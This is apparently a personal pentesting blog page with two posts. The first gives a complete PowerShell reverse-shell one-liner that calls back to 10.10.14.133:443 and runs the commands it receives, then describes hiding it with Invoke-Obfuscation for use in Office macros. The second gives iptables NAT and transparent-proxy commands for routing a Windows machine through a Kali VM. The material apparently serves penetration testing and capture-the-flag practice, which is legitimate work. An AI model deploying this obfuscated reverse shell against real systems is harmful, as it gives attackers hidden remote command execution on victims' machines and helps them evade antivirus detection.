Showing posts from April, 2022

Office Macro's Reverse Shells

  Obfuscate the PowerShell code

    # PowerShell one-liner
    $client = New-Object System.Net.Sockets.TCPClient('10.10.14.133',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

    # Save the above rev-shell to a file: rev.txt
    # Download Invoke-Obfuscation
    Import-Module ./Invoke-Obfuscation.psd1
    Invoke-Obfuscation

  Output:

    Choose one of the below options:

    [*] TOKEN     Obfuscate PowerShell command Tokens
    [*] AST       Obfuscate PowerShell Ast nodes (PS3.0+)
    [*] STRING    Obfuscate entire command as a String
    [*] ENCODING  Obfuscate entire command via Encoding
    [*] COMPRESS  Conve

Route Windows through Linux VM

  This is helpful when you want to access a VPN network (or a network reachable only from a specific machine) from a different Windows box. Assuming you are connected to the VPN from the Linux box, the commands below will help.

  On Windows

    route delete 0.0.0.0
    route add 0.0.0.0 mask 0.0.0.0 kali_IP

  On Linux

    sudo sysctl net.ipv4.ip_forward=1
    sudo iptables -t nat -A POSTROUTING -o tun0 -j MASQUERADE
    sudo iptables -A FORWARD -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
    sudo iptables -A FORWARD -i eth0 -o tun0 -j ACCEPT
    ## tun0 = VPN network
    ## eth0 = interface shared by Windows and Linux

  Transparent Proxy

    sudo sysctl net.ipv4.ip_forward=1
    sudo iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 80 -j REDIRECT --to-port 8080
    sudo iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 443 -j REDIRECT --to-port 8080